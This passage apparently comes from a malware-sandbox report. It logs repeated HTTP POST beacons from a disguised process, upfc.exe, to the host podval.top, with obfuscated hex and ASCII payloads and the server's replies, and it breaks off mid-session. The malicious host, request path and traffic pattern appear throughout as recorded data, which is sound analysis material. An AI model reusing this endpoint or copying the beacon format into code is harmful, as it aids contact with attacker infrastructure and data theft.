                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nKRWoqrxGeSCB117MvU6oFAW1opoSEXFbu5POZUMQYHopr%2BTEM9MnT8RTUWHQUGr63TJXoxR5XsopxkuvCQEszAD7sPUaConfEiTfwscHtIXCYOPS5a%2Bmx%2BMhG85"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6376e0d42af-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
122         192.168.2.10  49840        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
Timestamp  Bytes transferred  Direction  Data
Jul 3, 2024 16:43:41.872080088 CEST  270  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:42.231978893 CEST1060OUTData Raw: 5a 55 5f 5e 5b 5d 57 58 58 56 55 51 50 5a 59 56 55 51 5e 58 51 5b 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZU_^[]WXXVUQPZYVUQ^XQ[SZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%:0A30)4.9\:&'%=Y0(;?_ 4;"['$Y )
Jul 3, 2024 16:43:42.320619106 CEST  25  IN  HTTP/1.1 100 Continue
Jul 3, 2024 16:43:42.530328989 CEST  580  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:42 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RrfNYlyRuqgsuUeTSnRzD%2BMvJg6CPKHWWirLKkIU9aORE95hMC3oySz4ZyC4ckBCvjhE6%2BXfUGNoEJs40%2BA5ctCRs67HeMv8chUX453svAJqfkvCXyBx5cwHQY3u"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a63d3ba343c2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    123 | 192.168.2.10 | 49841 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:42.660562038 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:43.010312080 CEST | 1060 | OUT | Data Raw: 5f 52 5a 5c 5b 5a 57 5d 58 56 55 51 50 58 59 57 55 5f 5e 58 51 59 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _RZ\[ZW]XVUQPXYWU_^XQYSXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[19/'83 *4-1[.*'6$<,>(#/"['$Y !
                                                    Jul 3, 2024 16:43:43.207057953 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:43.415102005 CEST | 584 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:43 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zdr1B55wDQAZi9v2G%2FmZ0zfqlyo14iCnHwdXoAgbmZxIwVZ45BYznxYCg2H%2FRD%2Bq4sdpzG1%2FfBUC8I3%2BMQqcY003slfs3T0OAWWipsSOIs69PyIEer8203wIfzDH"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a642cce272c2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    124 | 192.168.2.10 | 49842 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:43.551006079 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:43.901467085 CEST | 1060 | OUT | Data Raw: 5f 50 5f 58 5e 5a 57 50 58 56 55 51 50 58 59 56 55 5b 5e 54 51 54 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _P_X^ZWPXVUQPXYVU[^TQTSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"&)?'98'7(>.!>%:3)$+U/X T7/"['$Y !
                                                    Jul 3, 2024 16:43:44.006256104 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:44.348320007 CEST | 573 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:44 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oRPBxhlug0O%2FHL067Cw3x5Z6ohu3AeKZMnTG26xj0ybqNZ0Jsq30MjJdHcDpDvYpKq4awR15osyZ0b%2Bo9Th07ZN8iYsnf17MzlH3WtlESfO4NcXhXSEe5r5YFrhc"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a647ce387cb1-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:43:44.447985888 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    125 | 192.168.2.10 | 49843 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:44.577975988 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:44.932097912 CEST | 1056 | OUT | Data Raw: 5a 52 5f 5a 5b 5b 57 5c 58 56 55 51 50 59 59 55 55 5d 5e 5e 51 5a 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZR_Z[[W\XVUQPYYUU]^^QZSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\19A0'V *-64=>.$'7,=8#2 /"['$Y =


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    126 | 192.168.2.10 | 49844 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:45.080379009 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1736
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:45.432209969 CEST | 1736 | OUT | Data Raw: 5f 5a 5a 5e 5b 59 57 5d 58 56 55 51 50 59 59 50 55 51 5e 55 51 5f 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _ZZ^[YW]XVUQPYYPUQ^UQ_S[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"2'':#%#(=-2#..-36>%#$/.Y72$8,"['$Y )
                                                    Jul 3, 2024 16:43:45.574035883 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:45.915699959 CEST | 729 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:45 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=54H10diVrO1Il%2BVqz7cHXcoaNqK4sOfXTGpycmo%2B%2BiCP8iqLVwETX4mWJoxOSBPnvJShwd0RuD2XJGN6d7MZotld5ObH7xmQC5e8VnMUvEtedC886jMdMjoMAKCu"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6518e8f0cae-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 1a 25 14 35 10 26 22 0d 50 3a 5b 38 0a 28 3e 24 5e 3b 07 35 5b 3c 24 04 05 2e 3d 2e 18 20 04 25 07 2b 3c 20 59 26 56 2f 0d 35 31 20 5b 04 1c 20 00 2b 39 36 01 29 2b 2c 0c 26 05 22 1b 30 09 17 10 33 02 32 57 24 5e 3c 00 3d 2b 2a 09 24 54 33 5a 3d 06 2d 06 3c 09 04 59 36 0e 21 54 02 13 22 50 33 13 3d 52 37 0e 0a 0a 25 33 22 01 24 27 34 0c 33 0a 2e 54 2a 0d 29 0c 30 32 3c 5a 21 3f 02 0f 27 16 22 5f 27 2d 3a 00 22 12 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%%5&"P:[8(>$^;5[<$.=. %+< Y&V/51 [ +96)+,&"032W$^<=+*$T3Z=-<Y6!T"P3=R7%3"$'43.T*)02<Z!?'"_'-:"#_+)V3YT0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    127 | 192.168.2.10 | 49845 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:45.202579021 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:45.557127953 CEST | 1060 | OUT | Data Raw: 5a 52 5f 55 5b 56 57 59 58 56 55 51 50 5d 59 54 55 5c 5e 58 51 5b 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZR_U[VWYXVUQP]YTU\^XQ[SZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Z':,C0?\3V+_>>1S >-X9X$"3(/.7"(Z;"['$Y 5
                                                    Jul 3, 2024 16:43:45.677907944 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:45.882349014 CEST | 588 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:45 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w%2BJPXvMw8YYRJA4%2Bd5vht2WzSLaABX7kfYl8LeNb6ZkY%2FreZIOFCKR%2F5yJX%2BRyM%2FwcVK55uCIdyNaLDEUwSaJvZv35wO%2BQiQ7o2FxVIUvTtQhfYvJB4Rw0TuHaQ3"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6522f327298-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    128 | 192.168.2.10 | 49846 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:46.015672922 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:46.370336056 CEST | 1060 | OUT | Data Raw: 5f 50 5a 5f 5b 5f 52 5c 58 56 55 51 50 58 59 57 55 59 5e 5a 51 5a 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _PZ_[_R\XVUQPXYWUY^ZQZSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"1_,&9#$#)=9!=.X=&5>30,8.X "/,"['$Y !
                                                    Jul 3, 2024 16:43:46.464138031 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:46.811393976 CEST | 582 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:46 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lezGgIUNH0vRJaP03s0%2FZi%2Fpv7RMQB8NqtkVraiOuVplv5U59%2B0kGDkdtcLEO5K6H2USV6txCUM%2FiaIZpP9PKrgzH8Od1tIKmeRJ7EF7Ylj0CrqoX2THbk3So0E7"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a65719e1c463-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    129 | 192.168.2.10 | 49847 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:46.934653997 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:47.306325912 CEST | 1060 | OUT | Data Raw: 5a 57 5a 59 5b 59 52 5b 58 56 55 51 50 5e 59 52 55 51 5e 5b 51 55 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZWZY[YR[XVUQP^YRUQ^[QUSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X&E08'0#_).: [%Z:X!X'&>'#3->#!?;<"['$Y
                                                    Jul 3, 2024 16:43:47.408875942 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:47.613430977 CEST | 584 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:47 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m0QZ%2B2s4wmpN5oMh1rhNoL6XRBYGyZYB1YVFcQYPxfzr2WNaY7R8Jmd6T6H5n%2F9bAgPC8VPe4UtxllhuGs9jk6xTjo4%2BZJJXl57x8rs7%2B2Z%2BJFXHJnMfLtsO3dOr"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a65cfb985e68-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    130 | 192.168.2.10 | 49848 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:47.751213074 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:48.103952885 CEST | 1060 | OUT | Data Raw: 5a 52 5a 5f 5e 5d 57 5e 58 56 55 51 50 58 59 5a 55 5f 5e 54 51 5e 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZRZ_^]W^XVUQPXYZU_^TQ^S_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]2$&9]';Z)=1#!\.-!Y0:'#,-< 2[/,"['$Y !
                                                    Jul 3, 2024 16:43:48.219525099 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:48.561326027 CEST | 573 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=An8wjm1AbhgRRGbQIZWCiLIO0E9AQchC1xoXDWsv%2F8PYYNcb77QnyVOUc4%2FcUFXCyFMvYyvr8tmyvqbvlsHMdhCoaEYY81u9yYeBsKaXVSflUjZPQPevrKcLXh8O"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6621e26181d-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:43:48.646692038 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    131 | 192.168.2.10 | 49849 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:48.779884100 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:49.137830019 CEST | 1060 | OUT | Data Raw: 5f 56 5f 54 5b 5e 57 5f 58 56 55 51 50 50 59 51 55 5f 5e 55 51 5c 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V_T[^W_XVUQPPYQU_^UQ\S_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"%:<'_7Y0##Z*-97\9>)]034;=< !#8"['$Y
                                                    Jul 3, 2024 16:43:49.353463888 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:49.686954021 CEST | 577 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:49 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vw4Zvnp%2B3BhwbFE5X5Hxn%2FxWnv8uzGoinJULhNotGvM0onoSHBheUNJxH%2FyMC2u2Dnho7ynnejliR7%2Fy6ZDVs7l1EmvM6SseKvC3n7EArTpXXloIOf8QdEkKqxW2"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6692c7a1865-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:43:49.773813963 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    132 | 192.168.2.10 | 49850 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:50.012986898 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:50.372309923 CEST | 1060 | OUT | Data Raw: 5a 52 5f 54 5b 5a 52 58 58 56 55 51 50 58 59 52 55 51 5e 5b 51 5b 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
